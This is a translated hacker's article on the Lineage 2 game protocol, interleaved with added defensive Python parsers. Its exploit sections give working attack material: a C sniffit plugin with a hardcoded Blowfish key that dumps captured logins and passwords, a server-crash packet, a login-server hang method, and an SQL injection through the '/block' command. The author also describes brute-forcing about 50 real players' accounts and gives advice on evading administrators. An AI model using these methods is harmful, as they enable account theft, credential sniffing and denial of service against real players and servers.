// SetPrivateStoreBuyMsg a package

 

XX XX // the Size of data

94 // type of a package

41 00 41 00 41 00 42 00 42 00 42 00 // the text. Symbols should be divided among themselves null-byte

00 00 // the end of a package

 

 

Further we use a package of type 0x91 (SetPrivateBuyList). In it just we transfer quantity of subjects, Item ID and the price. For example:

Код:

 

// SetPrivateStoreList a package

XX XX // the Size of data

91 // type of a package

01 00 00 00 // quantity of things

// the beginning of the block

e1 02 00 00 // Item ID

00 00 01 00 00 00 // how many subjects of the given type to buy up

e8 03 00 00 // the price

// the end of the block

 

 

 

 

I shall a little explain this package. We have put them on buying up 1 thing with IID 0x2e1 (Scroll of Resurrection) for 1000 аден. And last package of type 0x1d. It directly starts trade:

Code:

XX XX // size of the data
1d // type
01 00 00 00 // quantity

 

 

As for selling, it is practically all the same. Only instead of 'SetPrivateBuyMsg' 'SetPrivateStoreMsg' is used, and instead of 'SetPrivateBuyList', 'SetPrivateStoreList' respectively. And, I almost forgot, instead of the Item ID the Object ID is used, because we are selling one specific item.

 

b) Private messages. Here everything is very simple.

Code:

XX XX // size of the data
38 // packet type (Say2)
42 00 42 00 42 00 42 // the message (BBBB)
00 00 00 02 00 00 00 // separator =)
41 00 41 00 41 00 41 // nickname (AAAA)
00 00 00 // the end

 

 

 

c) An example of the packet in which the server sends us the list of all items on the char. It is this packet that assigns a unique Object ID to each Item ID.

Code:

XX XX // length of the packet
1b // packet type (0x1b on antaras.ru)
00 00 05 00 // number of items
04 00 // item type
1e 26 14 40 // Object ID
d4 15 00 00 // Item ID (0x15d4 - Tutorial Guide)
01 00 00 00 // Quantity
05 00 00 00 00 00 00 00 00 00 00 00 00 00 // enchant level, quest item, dropped or not, and something else
01 00 // item type
1d 26 14 40 // Object ID
7b 04 00 00 // Item ID (0x47b - Squire's pants)
01 00 00 00 // Quantity
01 00 00 00 00 00 00 08 00 00 00 00 00 00 // (same fields as above)
01 00 // item type
1c 26 14 40 // Object ID
7a 04 00 00 // Item ID (0x47a - Squire's Shirt)
01 00 00 00 // Quantity
01 00 00 00 00 00 00 04 00 00 00 00 00 00 // (same fields as above)
00 00 // item type
1b 26 14 40 // Object ID
0a 00 00 00 // Item ID (0x0a - dagger)
01 00 00 00 // Quantity
00 00 00 00 00 00 80 00 00 00 00 00 00 00 // (same fields as above)
00 00 // item type
1a 26 14 40 // Object ID
42 09 00 00 // Item ID (0x942 - Guild Member's Club)
01 00 00 00 // Quantity
00 00 00 00 00 00 80 00 00 00 00 00 00 00 // (same fields as above)
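An added parser for the item-list packet above (my code, not the article's): it checks the 2-byte length prefix against the bytes actually received, refuses an item count that the payload cannot hold, decodes each 28-byte record, and verifies the descending-OID rule from section 4 on the sample. The sample bytes are the article's dump with the "XX XX" prefix filled in as 0x0093 (147, counting the two length bytes themselves, consistent with the l2j read loop quoted in section 9); reading "00 00 05 00" as a 2-byte flag plus a 2-byte count, and the field names after the quantity, are my assumptions.

```python
import struct
from dataclasses import dataclass
from typing import Callable, List

ITEM_LIST_OPCODE = 0x1B
HEADER_LEN = 1 + 2 + 2        # opcode, 2-byte flag, 2-byte item count (assumed split of "00 00 05 00")
RECORD_FMT = "<HIIIHHHIHH"    # type1, OID, IID, quantity, type2, custom1, equipped, bodypart, enchant, custom2 (assumed)
RECORD_LEN = struct.calcsize(RECORD_FMT)   # 28 bytes per item record


class PacketError(ValueError):
    """Raised when a packet's declared sizes do not match the bytes received."""


@dataclass
class Item:
    type1: int
    object_id: int
    item_id: int
    quantity: int
    body_part: int
    enchant: int


def strip_length_prefix(frame: bytes) -> bytes:
    """Check the 2-byte little-endian length (which counts itself) against the buffer."""
    if len(frame) < 3:
        raise PacketError("frame shorter than length prefix plus opcode")
    (declared,) = struct.unpack_from("<H", frame, 0)
    if declared != len(frame):
        raise PacketError(f"declared length {declared}, received {len(frame)} bytes")
    return frame[2:]


def parse_item_list(body: bytes) -> List[Item]:
    """Decode the item records, refusing a count that the payload cannot hold."""
    if not body or body[0] != ITEM_LIST_OPCODE:
        raise PacketError("not an ItemList packet")
    if len(body) < HEADER_LEN:
        raise PacketError("truncated ItemList header")
    _flag, count = struct.unpack_from("<HH", body, 1)
    if len(body) != HEADER_LEN + count * RECORD_LEN:
        raise PacketError(f"item count {count} does not fit a {len(body)}-byte body")
    items = []
    for off in range(HEADER_LEN, len(body), RECORD_LEN):
        (type1, oid, iid, qty, _type2, _custom1, _equipped,
         body_part, enchant, _custom2) = struct.unpack_from(RECORD_FMT, body, off)
        items.append(Item(type1, oid, iid, qty, body_part, enchant))
    return items


def oids_descend(items: List[Item]) -> bool:
    """True when each OID is the previous one minus 1, the rule stated in section 4."""
    return all(b.object_id == a.object_id - 1 for a, b in zip(items, items[1:]))


def is_rejected(parser: Callable[[bytes], object], data: bytes) -> bool:
    """True when the parser refuses the data with PacketError."""
    try:
        parser(data)
    except PacketError:
        return True
    return False


# The article's dump, with the length prefix filled in (0x0093 = 147 bytes including the prefix).
SAMPLE_FRAME = bytes.fromhex(
    "9300"                    # length
    "1b" "0000" "0500"        # opcode, flag, item count = 5
    "0400 1e261440 d4150000 01000000 0500 0000 0000 00000000 0000 0000"   # Tutorial Guide
    "0100 1d261440 7b040000 01000000 0100 0000 0000 00080000 0000 0000"   # Squire's pants
    "0100 1c261440 7a040000 01000000 0100 0000 0000 00040000 0000 0000"   # Squire's Shirt
    "0000 1b261440 0a000000 01000000 0000 0000 0000 80000000 0000 0000"   # dagger
    "0000 1a261440 42090000 01000000 0000 0000 0000 80000000 0000 0000"   # Guild Member's Club
)


def decode_sample() -> List[Item]:
    return parse_item_list(strip_length_prefix(SAMPLE_FRAME))


if __name__ == "__main__":
    for it in decode_sample():
        print(f"OID {it.object_id:#010x}  IID {it.item_id:#06x}  x{it.quantity}  slot {it.body_part:#06x}")
    print("OIDs descend by one:", oids_descend(decode_sample()))
```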

 

 

d) Talking to an NPC, using skill learning as an example. To begin with, we need to select the NPC and start a dialogue with it:

Code:

04 // packet type (Action)
51 14 10 48 // OID of the NPC
// then come the character's coordinates
c6 51 01 00 // X
52 45 02 00 // Y
b8 f2 ff ff // Z
00 // the end

 

A single send of this packet selects the NPC. To start a dialogue with it, the packet has to be sent one more time. Then, when the window with the choice of dialogues opens and you choose the item "Learn skills", the client sends the server the following packet:

 

Code:

21 // packet type (RequestBypassToServer)
6c 00 65 00 61 00 72 00 6e 00 5f 00 73 00 6b 00 69 00 6c 00 6c 00 00 // learn_skill
00 // the end

 

 

After the skills dialogue has been called, you can either view information about any skill by means of:

Code:

6b // packet type (RequestAcquireSkillInfo)
10 00 00 00 // skill number
09 00 00 00 // the level

 

 

or learn this skill: exactly the same packet is sent, but with type 0x63 (RequestAcquireSkill).

 

 

IV. Problems and how they can be used

 

1. No limit on the number of authorization attempts

This makes it possible to search for the password of any account indefinitely. I will not describe how and what; a bruteforcer is a bruteforcer even in Africa. I will only tell about my personal experience in this area. The test was carried out on www.antaras.ru, an old, dying domestic Lineage 2 C1 OFF server (with additions from C3). Using only the information I gave above (plus non-blocking sockets), a bruteforcer (of logins and passwords) was written, and a program that pulls the list of nicknames playing on the server at the given moment from 'http://antharas.ru/?id=2'. I made a random list of passwords of the type 123456789, 0987654321 (on antaras.ru the minimum password length is 8 characters; on every server it differs); the list of nicknames of the gamers playing on the server at that moment came to ~1500 lines. I ran the bruteforcer from another server so as not to burn my IP. In total, about 50 accounts were opened in one night. But, unfortunately, more than half of the accounts were either empty or held low-level characters. But the other, smaller part... I will say only that the total loss inflicted on the gamers came to a bit more than 1kkk of game money (gear), or about $400 if converted into real money, depending on how you bargain. Though to tell the truth, it was not "inflicted" but "would have been inflicted". I actually took nothing at all from these accounts and found a somewhat different use for all of this ;) More on that below.

 

 

There are 3 pitfalls in cracking accounts by this method. First, if we log in to the server under a cracked account while its owner is using it at that moment, an inscription appears on his screen that somebody is breaking in :/ For this reason I ran the bruteforcer at night, and in general it is better to do it in the morning. But from my small experience I can say that, whether users do not pay attention to this inscription, or do not know English, or are simply unable to change the password, I had no problems with such accounts (on which somebody was playing). I mean, none of those who noticed me changed the password. Secondly, nickname != login. My program collected the nicknames of the players on the server, not their logins. But in such "mass" cracking this is not a very serious problem either: even if the person with nickname NICKNAME has login LOGINNAME, so that the search for passwords for NICKNAME fails, there will surely be somebody with login NICKNAME, so we will crack someone anyway, just not this particular character. Thirdly, if you have undressed one character or another, it can turn to the administration, and there is a probability that everything will be returned to it. How to prevent this? I have not run into it, but, reasoning logically, I can assume that: they will return everything if the guy proves it. In your justification you can say that you bought everything from him for real money (that is not recorded anywhere) and that the guy wanted to cheat you. For greater persuasiveness, at the moment of "undressing" transfer a round sum from your purse to somebody else and take a screenshot. But the administrators, in turn, can look in the logs and see thousands of login attempts there; accordingly, let the account sit for two weeks after cracking so that the logs of the attack sink into oblivion.
The administrators can also pay attention to the IP from which the victim usually comes and its mismatch with the one from which it was undressed. Here... you can find somebody who uses the same provider, or use its services yourself, or break into one of its boxes, or try to explain to the administrators that it simply spoofed you so cleverly. I have not seen programs on the Internet that implement the described way of cracking Lineage2 accounts... For this reason I decided to write and sell mine: la2brute.5bb.ru. It must be admitted that since it came into general use, cracking accounts has become harder and harder. If, after I wrote it (somewhere in February 2006), I could crack up to 30-50 accounts a night on the popular Russian servers, now this figure is 4-5 times smaller. And lastly, I would like to note that the only server that implemented protection against password search was la2.abyss.ru. Though actually antaras.ru also introduced protection: blocking an account for 5 minutes after 40 failed login attempts. But against the mass search I wrote about above, this protection is practically useless.

 

 

2. Encryption of packets

 

As I already said about packet encryption above, the key used to generate the subkeys on the login server is constant. That is understandable: to compute all the P and S values, the Blowfish encryption algorithm has to be executed 521 times. Generating new values for each client would devour a great deal of system resources. But the thing is that l2j does exactly that! Although the key is constant, l2j generates the subkeys for every connection! I do not know how the OFF version does it (I do not have it, and it is very hard to get), but l2j proves that this is quite within the power of today's computers. And the problem is that we can sniff other people's sessions and easily decipher them, pulling out the login and the password. So what is the point of encrypting packets with blowfish then? I have written a plugin for sniffit version 0.3.7.beta that catches and deciphers all packets passing through your computer that contain a login/password for lineage2 accounts.

Code:

====> la2_plugin.plug <====
/*
Sniffit 0.3.7.beta LineAge2 c3 plugin
Allows to catch and decode la2 RequestAuthLogin packets *on the fly*
and dump login/passwords.

by darkgrey / m00.blackhat.ru

~broken
*/

#include "/usr/local/include/blowfish.h"
#define KEY_LEN 20

BF_KEY bfkey;

char key[] = "[;'.]94-31==-&%@!^+]";

void init_la2_plugin() {
    printf("LineAge2 C3 plugin enabled\n\n");
    BF_set_key(&bfkey, KEY_LEN, key);
}

void PL_la2_plugin (struct Plugin_data *PLD) {
    int i = 0;
    int count = (PLD->PL_info.DATA_len - 2) / 8;
    char *ptr = PLD->PL_data;
    unsigned char *ls_ip;

    if(PLD->PL_info.DATA_len == 0x32 && PLD->PL_info.UDP_len == 0) {
        ls_ip=(unsigned char *)&(PLD->PL_iphead.destination);
        printf("Login Server ip: %u.%u.%u.%u\n",ls_ip[0],ls_ip[1],ls_ip[2],ls_ip[3]);

        for(i = 0; i < count; i++)
            BF_encrypt((BF_LONG *)((short*)ptr+1+i*4), &bfkey, BF_DECRYPT);

        i = 2; printf("Login: ");
        while(PLD->PL_data[i++] != '\x00' || i != 16)
            printf("%c",PLD->PL_data);

        printf("\nPassword: ");
        while(PLD->PL_data[i++] != '\x00' || PLD->PL_data != '\x08')
            printf("%c",PLD->PL_data);

        printf("\n");
    }
}
/* eof */

====> sn_plugins.h <====
#define PLUGIN2_NAME "LineAge2 c3 Plugin"
#define PLUGIN2(x) PL_la2_plugin(x)
#define PLUGIN2_INIT() init_la2_plugin()
#include "la2_plugin.plug"
/* eof */

 

 

 

To use it, you need to copy both files into the directory with sniffit. For compilation you need the same blowfish library and the corresponding entry in the makefile. m00.blackhat.ru/m00-la2sniff.jpg shows the password bruteforcer for lineage2 servers at work and, started in parallel, sniffit with the installed plugin, using www.antaras.ru as an example (217.107.212.212 is the IP of the login-server).

 

3. Remote detection of the lineage2 server version

 

Remember I said that the last 8 bytes in the login-server packets are reserved for the checksum? More precisely, the penultimate 4 of them :> So if you send a packet without a checksum, the OFF version of the lineage server disconnects us. In l2j the function that checks the checksum returns true or false, but for some reason the return value is not checked. That is, l2j does not actually check the checksum. Accordingly: disconnected means OFF, not disconnected means l2j.

 

4. Remote "hanging" of a login-server

 

It was noticed that some servers reply to packets not containing a login/password with a packet of type 0x03 (which means that you are successfully authorized) and then start to behave extremely unstably. I checked this on 10 large C3 servers: half did not answer such a packet at all, the others answered with packet 0x01 (authorization failed), but only www.la2.ru sent 0x03 and for a while stopped accepting incoming connections (probably they have an "auto-restart" system). To implement a program that would hang la2.ru, you need to combine the packet generator given above with a simple tcp-client. An endless loop of sending such packets makes it impossible to get onto the game server.

 

5. Cloning

 

The vulnerability discussed now existed in the C1 and C2 versions, so I will not dwell on it. The essence is that, having authorized on the login-server once under one account, we could enter the game-server under the same account in parallel an unlimited number of times. Accordingly, it was possible to enter the game under the same character as many times as desired. The second possibility of cloning was described in the paragraph about IID and OID. Cloning items through the warehouse, pets and so on I will not consider; this topic does not seem interesting to me, since on normal servers it has not worked for a long time.

 

6. Creation of "mutants" and mixing skills

 

A very interesting topic. The first to implement these ideas in a program (on the Russian net) was Hint. To begin with, as far as you know, there are several races in lineage. Fixed classes are attached to each of them (mage and fighter). But a class of one race naturally differs from the similar class of another race (skills). And the dwarf race has no mage class at all. That was the necessary foreword for understanding everything described below. Now let us look at the character creation request:

Code:

0B // packet type
45 00 6D 00 30 00 30 00 00 00 // nickname of the char
04 00 00 00 // race
00 00 00 00 // sex
35 00 00 00 // initial profession (class)
14 00 00 00 // 6 constant values; I am at a loss to say what they mean
27 00 00 00
2D 00 00 00
1B 00 00 00
1D 00 00 00
0A 00 00 00
00 00 00 00 // hair type
00 00 00 00 // hair color
00 00 00 00 // face type

 

 

 

This packet will create a male dwarf fighter with the nickname "m00".

It turned out that the server (even the official one) does not check that the race matches the chosen class. This allows us to create chars of one race with a class of an entirely different one (I call them mutants =)). It sounds interesting, of course, but in reality we get a usual char with the stats and skills of the class, only with a model unusual for it. In theory the bug can give us nothing but fun (a light elf who spoils mobs :)), but it turned out that two more things follow from this, at first sight uninteresting, bug. As you know, each race has its own NPCs at which quests for a profession are taken and skills are learned. And so, mutants learn the skills of the class of one race at the NPC of another race. For example, playing a light elf, I learned the dwarf skill "Spoil" at an elf NPC. And then the question arose: who will then give me a profession, and which one? The thing is that skills are given depending on the profession (in the given context, the "class"), while quests depend on the race. That is, it may turn out that on reaching the 20th level as a dwarf-spoiler you can receive the profession "Elven Knight" (the first profession of light elves). But this information has not been confirmed in practice.

 

By the way, only a small number of mutants can learn skills at all. And speaking of skills in la2, there is one more bug. The official LA2 client does not check that the char's level matches the level required for the skill being learned. That is, for example, being a 5th-lvl human fighter you can learn Mortal Blow of the maximum level (provided that you have enough SP). This is easily done at the packet level. I would add that on an l2j server there are no checks at all. That is, you can learn even those skills that are accessible only to a GM.

 

7. Immortality.

 

Here we have reached the most interesting topic, known among the people as god mode. You will agree, on a server with more than 1000 people online, being immortal is a pleasure =) To begin with, when does immortality occur? This question received a banal but, as it turned out, exact answer: when the char is already dead. It seems like nonsense, but when a character has 0 HP and is alive, it cannot be killed (well, not absolutely impossible :) more on that below). But how to make the char have an absolute 0 HP, be alive, and still not have its HP restored? To begin with, let us consider the problem of 0 HP. In la2 there is such a bug: if after death you press "return to the nearest village" and immediately kill the l2.exe process, the char will appear in town with an absolute 0 HP and even with buffs (if it had them before). This is because after the RequestRestartPoint packet the client must send an Appearing packet, after which the server actually restores the char's HP and removes the buffs. And since we close the client, it does not have time to send this packet.

 

By the way, why do I keep saying an "absolute" 0? The thing is that on the server HP is stored in a variable of type float (the most interesting part being that it is sent to the client as an integer). That is, if you gradually reduce HP to 0 by means of bleed or poison you will not get an absolute 0, and if HP is not zero, you are alive. Therefore the only way to get an absolute 0 is to die. So, we have learned how to get 0 HP; now let us talk about how to freeze it at zero.

1) The first step in this direction was the creation of a dwarf-mage (as described in the previous paragraph). Most likely, because dwarves have no such class as mage at all, HP/MP do not regenerate for it. Accordingly, having performed the above actions with such a dwarf, we get an immortal character. This bug has been fixed practically everywhere.

2) The second way was found a little after the dwarf-mages. It turned out that when a nonexistent race is chosen, an immortal human with any class is created. And the most interesting thing is that if you create a human mage this way, you still get a human fighter, but with magic skills. These two ways have two very serious drawbacks:

a) the created characters cannot learn skills or receive a profession;

b) as you understand, HP regen does not work at all, so you will have to run around immortal all the time.

3) And now, attention, a bug that the same Hint helped me find.

As you know, in lineage there is such a thing as overweight. When you are loaded to 65%+, your running speed, attack and regeneration drop. But few people know that at 90%+, besides not being able to move, your HP does not regenerate! But what is the point of appearing in town after death and standing in one place, immortal? And here a strider helps us! Sitting on it, you can run at its speed while HP still does not regenerate! But there is a small reef here too: on some servers (reborn.ru - C4) you cannot attack while on a strider. Nothing can be done about it; I can only advise using the buffs blazing skin/freezing skin.

4) And the last immortality bug is the demon's set. Perhaps the oldest immortality bug, and basically everyone knows about it. It is based on your HP becoming negative, so you again cannot be killed. All the types of immortality described above share one serious flaw. The character ceases to be immortal as soon as its HP increases somehow, as a consequence of a lvlup or a banal heal. It also dies from bleed, poison and some vampirisms. I also recall the bug with "fake death". On some crooked java servers, after FD chars remain as if dead and cannot be attacked until they restart. Well, that is just by the way.

 

8. 'Remote DoS' and what it gives

Usually vulnerabilities of this sort are not especially valued, since nothing more than simple "jokes" can be obtained from them. LA2 constantly saves the state of the world (every N seconds; this question has not been studied precisely yet, and it is not that important) so that after a sudden crash it can roll back. That is, being able to predict (or provoke) a game-server crash, we gain "power over rollbacks". What does that mean? What, they killed you? Rollback! You were undressed? Rollback!! Your enchant failed? Rollback!!! Besides, there are very valuable monsters with a very long respawn time (fairy queen timinel - respawn 5 hours, for example) that exist in a single copy. Killed it, crashed the server, the server came up, the mob has appeared again. As a result the respawn time shrinks from 5 hours to minutes. How to crash a server? For l2j a 100% working way is crystallization.

Code:

72 // RequestCrystallizeItem
00 00 00 00 // OID of the item
FF FF FF FF // quantity

 

 

The real OID of an item is substituted into this packet and it is sent, whereupon the server falls instantly. For OFF projects everything is more complex. When packets are encrypted with a wrong key, the server sometimes falls. Why? If the keys do not match, the server obtains completely random values on decryption (that is, not what we encrypted). And I have not yet managed to track down exactly which sequence of values makes the server fall.

 

9. Integer overflow in the l2j network handler

 

Well, to finally refute the opinion that there are no serious bugs in lineage2, I will show you an integer overflow in the l2j server, in the procedure that processes client packets:

Code:

public void run()
{
    _log.fine("loginserver thread[C] started");
    int lengthHi = 0;
    int lengthLo = 0;
    int length = 0;
    boolean checksumOk = false;
    int sessionKey = -1;
    String account = null;
    String gameServerIp = null;
    try
    {
        InetAddress adr = InetAddress.getByName(_gameServerHost);
        gameServerIp = adr.getHostAddress();
        Init startPacket = new Init();
        _out.write(startPacket.getLength() & 0xff);
        _out.write(startPacket.getLength() >> 8 & 0xff);
        _out.write(startPacket.getContent());
        _out.flush();
        do
        {
            lengthLo = _in.read();
            lengthHi = _in.read();
            length = lengthHi * 256 + lengthLo;
            if(lengthHi < 0)
            {
                _log.warning("Client terminated the connection.");
                break;
            }
            byte incoming[] = new byte[length];
            incoming[0] = (byte)lengthLo;
            incoming[1] = (byte)lengthHi;
            .................
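To make the defect concrete, here is an added Python model of the read loop above (my code, not l2j's) next to a checked version: the l2j-style reader tests only `lengthHi` for end-of-stream and allocates `length` bytes before verifying that `length` can even hold the two header bytes, so a header declaring 0 or 1 faults on the `incoming[0]`/`incoming[1]` stores. `ByteStream.read_byte()` imitates Java's `InputStream.read()` (one byte as 0..255, or -1 at EOF); the frames are constructed, the well-formed one being the RequestRestartPoint packet from section 16 with its length prefix.

```python
from typing import Callable, Optional


class PacketError(ValueError):
    """A frame header that cannot be trusted."""


class ByteStream:
    """Minimal stand-in for Java's InputStream over a captured byte string."""

    def __init__(self, data: bytes):
        self._data, self._pos = data, 0

    def read_byte(self) -> int:
        """Like InputStream.read(): next byte as 0..255, or -1 at end of stream."""
        if self._pos >= len(self._data):
            return -1
        value = self._data[self._pos]
        self._pos += 1
        return value

    def read_exact(self, n: int) -> Optional[bytes]:
        """n bytes, or None if the stream ends first."""
        chunk = self._data[self._pos:self._pos + n]
        if len(chunk) != n:
            return None
        self._pos += n
        return chunk


def read_frame_like_l2j(stream: ByteStream) -> Optional[bytes]:
    """Mirror of the quoted loop: only lengthHi is tested for EOF and the
    length is used unvalidated, so a header declaring 0 or 1 makes the
    incoming[0]/incoming[1] stores land past the end of the buffer
    (IndexError here, ArrayIndexOutOfBoundsException in Java)."""
    length_lo = stream.read_byte()
    length_hi = stream.read_byte()
    length = length_hi * 256 + length_lo
    if length_hi < 0:
        return None                          # "Client terminated the connection."
    incoming = bytearray(length)             # new byte[length]
    incoming[0] = length_lo
    incoming[1] = length_hi
    incoming[2:] = stream.read_exact(length - 2) or b""
    return bytes(incoming)


def read_frame_checked(stream: ByteStream) -> Optional[bytes]:
    """Validate before allocating: both header bytes must be present, the
    length must cover the header plus at least an opcode, and the declared
    number of bytes must actually arrive. Returns the body (opcode onwards)."""
    header = stream.read_exact(2)
    if header is None:
        return None                          # clean end of stream between frames
    length = header[0] | (header[1] << 8)
    if length < 3:
        raise PacketError(f"frame length {length} cannot hold header and opcode")
    body = stream.read_exact(length - 2)
    if body is None:
        raise PacketError("frame truncated by peer")
    return body


def outcome(reader: Callable[[ByteStream], Optional[bytes]], data: bytes) -> str:
    """Classify what a reader does with the bytes: ok, eof, index-error or packet-error."""
    try:
        return "eof" if reader(ByteStream(data)) is None else "ok"
    except IndexError:
        return "index-error"
    except PacketError:
        return "packet-error"


# Constructed frames: a well-formed RequestRestartPoint and two hostile headers.
GOOD_FRAME = bytes.fromhex("0700" "6d" "00000000")
LENGTH_ONE = bytes.fromhex("0100")
LENGTH_ZERO = bytes.fromhex("0000")

if __name__ == "__main__":
    for name, data in [("good", GOOD_FRAME), ("len=1", LENGTH_ONE), ("len=0", LENGTH_ZERO)]:
        print(f"{name:6} l2j-style: {outcome(read_frame_like_l2j, data):12} "
              f"checked: {outcome(read_frame_checked, data)}")
```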

 

 

 

It is certainly not quite an 'integer overflow' in the classical sense of the phrase, but it leads first to a two-byte overflow (off-by-two overflow) and then to... A similar vulnerability exists in the La2 client and in l2walker. They hang, devouring 100% of processor time. But I do not have their source code, though there is reason to believe that the code there is somewhat different. By the way, the L2J server is simply full of similar bugs. Many of them are described on cheat forums.

10. SQL-injection

Yes, more servers have probably been cracked through this bug in forums than were once cracked with the unicode bug in iis. What was my surprise when I learned that it exists in lineage too. And it is basically clear why: much of what we send to a la2-server (titles for clan members, nicknames for ignore, the friends list and so on) is added straight into the server's sql database. Accordingly, a simple command /block ' SHUTDOWN - lets us switch off the sql-server. What amazes most is that the administrators who undertook to fix this bug first of all filtered "SHUTDOWN -" out of what is sent, and only then guessed that restarting the server is the very least that can be done using this bug. I will not go into more detail on this bug, as it is perhaps the most serious one in lineage at all. I will only say that its fix is extremely crooked :)
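As an added illustration of the fix (my code, not the server's; the table and column names are constructed), the "/block <nick>" command is implemented twice: once with the nickname spliced into the statement text, which is the defect described above, and once with the nickname bound as a parameter. A keyword filter of the kind the administrators tried first is included to show why it does not address the root cause: any nickname containing a quote still breaks the spliced statement, while the bound version stores it verbatim.

```python
import sqlite3
from typing import List


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the server's database (constructed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ignore_list (owner TEXT NOT NULL, blocked TEXT NOT NULL)")
    return conn


def block_player_unsafe(conn: sqlite3.Connection, owner: str, nick: str) -> None:
    """The defect: the nickname becomes part of the SQL text, so a quote in it
    ends the string literal and whatever follows is parsed as SQL."""
    conn.execute(f"INSERT INTO ignore_list (owner, blocked) VALUES ('{owner}', '{nick}')")


def block_player_safe(conn: sqlite3.Connection, owner: str, nick: str) -> None:
    """The fix: bind the nickname as a parameter, so it stays data."""
    conn.execute("INSERT INTO ignore_list (owner, blocked) VALUES (?, ?)", (owner, nick))


def blocked_by(conn: sqlite3.Connection, owner: str) -> List[str]:
    return [row[0] for row in conn.execute(
        "SELECT blocked FROM ignore_list WHERE owner = ?", (owner,))]


def keyword_filter_passes(nick: str) -> bool:
    """The kind of fix the article says admins tried first: reject one keyword."""
    return "SHUTDOWN" not in nick.upper()


def unsafe_outcome(nick: str) -> str:
    """'stored' if the spliced statement accepted the nick, else the sqlite error class."""
    conn = make_db()
    try:
        block_player_unsafe(conn, "m00", nick)
    except sqlite3.Error as exc:
        return type(exc).__name__
    return "stored"


def safe_outcome(nick: str) -> List[str]:
    """What the bound statement stores for the same nick."""
    conn = make_db()
    block_player_safe(conn, "m00", nick)
    return blocked_by(conn, "m00")


if __name__ == "__main__":
    for nick in ["Hint", "' SHUTDOWN -", "O'Neil"]:
        print(f"{nick!r:16} filter passes: {keyword_filter_passes(nick)!s:5} "
              f"unsafe: {unsafe_outcome(nick):16} safe stores: {safe_outcome(nick)}")
```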

 

 

11. Enchant

 

For me, the enchanting bug is second in demand after "dupe". What is enchanting in general? It is a scroll that lets you improve the characteristics of one item or another and is then consumed. But it is not possible to improve endlessly. After +3 there is a probability that the item will break. And the higher the degree of "enchant" of the item, the greater the probability of its breaking (though, by the way, that is not a fact; more on it below). Precisely the presence of this variable "probability" has led to countless ways of enchanting. For example, somebody by some miracle managed to enchant to +6 while he... ran! And now this person writes on forums that this is a new 100% way of enchanting. Others write that it is better to enchant 1 at a time at the 1st level, that a dwarf enchants better, that the probability depends on "recommendations" or on intelligence (by the way, a man of education told me about INT), that it is better to enchant at night, to use soulshots, to hit a mob at that moment, to time the interval between enchants, and so on and so forth. I, of course, cannot argue with these claims, since I have not tested everything written on forums, but I know for sure that many people are ready to pay good money for a 100% way of enchanting. Hence, unfortunately, there is no such way in public. And does it exist at all? Let us try to figure this out together. To begin with, let us examine how an item is enchanted at the packet level. The 1st packet is when in the game we right-click the enchant scroll, that is, activate it.

Code:

14 // packet type (UseItem)
86 a4 13 40 // OID of the enchant scroll
00 00 00 00

After activating the enchant we choose the item we want to enchant:

Code:

58 // packet type (RequestEnchantItem)
74 a4 13 40 // OID of the item

 

 

Everything is extremely simple. By the way, alongside the numerous ways of enchanting there was a theory that the probability of enchanting is calculated on the client, and it is as if we tell the server whether the item broke or not. And as if a simple artmoney makes 100% enchanting possible. That is not true, as you have just seen. Really, at the packet level enchanting looks extremely simple.

How it is possible to deceive th


Here is what the program displayed:

-----------------------
0 1 1 0 1 1 0 1 1 0 0 0 0 0 0 1 0 1 0 1 1 0 0 1 1 1 0 1 1 1 0 0 0 1 0 0 0 1 0 1
1 0 0 0 0 0 0 1 1 1 1 1 0 1 1 0 1 0 0 1
29/31
Probability of success: 48.33
0 0 0 1 1 0 0 0 0 1 0 1 1 1 0 0 0 1 1 0 1 0 1 0 1 0 0 1 1 1 1 0 1 1 0 1 0 0 0 1
0 1 0 0 1 1 0 1 1 0 1 0 1 1 0 1 1 1 1 1
32/28
Probability of success: 53.33
1 0 1 1 0 1 0 1 1 1 0 1 1 1 0 1 1 0 0 1 1 0 1 1 1 1 0 1 1 1 0 0 0 1 0 0 1 1 0 0
0 1 0 1 1 0 0 1 0 1 0 0 1 0 0 0 0 1 0 0
31/29
Probability of success: 51.67
1 0 0 1 1 1 1 0 0 0 0 0 0 0 1 1 0 0 1 1 1 0 1 0 0 1 0 0 0 1 0 0 0 1 0 1 0 1 1 0
1 0 1 0 0 0 1 0 1 1 0 0 1 0 0 1 0 1 1 1
27/33
Probability of success: 45.00
Probability of success in the whole: 50.00

 

 

 

 

As you can see, the "random types" f4llen wrote about can be traced here: 0 and 1 come out equally often, and there is no law here. Moreover, in the intermediate measurements of probability (for every 60 numbers) the probability of success deviated a little from 50%, but overall it was as close as possible to the true probability of a 0 or a 1 coming out. Thus f4llen's statistics are nothing but an attempt to systematize ordinary randomness. And a last stone at those who believe that even the weather outside influences the probability of enchanting: in L2j there is no random number generator of its own; it uses the same library randomizer that was used above. With the only difference that the probability of enchanting is influenced by a single number set by the administration. Be assured, in lineage2 OFF it is the same. As a result, I want to say that you should not try to deceive rand(); it will sooner deceive you =) You need to look for bugs in the enchanting process, but, as was shown above, it is too simple a process to be bugged. And in general, "accidents do not happen; there are only laws unknown to us" (c) Somebody.

 

 

12. Geodata (walking through walls).

 

Today a person messaged me on ICQ and started arguing that l2j differs in nothing from an OFF server. In this connection I decided to add a couple of words to the article about geodata in l2j and OFF. Movement around the world in la2 is implemented in an interesting enough way. It turns out that both the server and the client watch where you go, in parallel. More precisely, you click on the point you want to reach; the client, according to the geodata it has, checks whether it is possible to pass there and, if yes, sends a request to the server. The server, already in accordance with its own geodata, either allows it or returns you to the starting position. This is exactly the phenomenon called "invisible walls", which, by the way, is inherent to our freeshard projects with crooked locations. In l2j there is no geodata; it is used as an add-on. What does this mean? That the char's movement is watched only by the client, against the geodata it has. Therefore, by using a bot (which, obviously, has no geodata either), you can walk through walls, because neither the server nor the client (in the person of the bot) knows about them at all. This problem, by the way, is not only l2j's. On C1 OFF, as a rule, C3/C4 locations also come without geodata, that is, there too the responsibility for movement is assigned only to the client. If we examine movement in more detail, it is implemented by the packet "0x01 MoveBackwardToLocation". It carries two sets of coordinates: where we stand and where we want to get. After this packet the server starts moving us to the desired point step by step. And it does not send us new coordinates with each step! For the client to learn at which point it currently is, the packet "0x48 ValidatePosition" is sent. That is, on the whole, we send a packet with the coordinates of where we want to get, and then simply periodically check, roughly speaking, how far we have progressed.
But that is just for general development, so to speak =)

 

 

 

13. Jokes with SocialAction (0x1b)

 

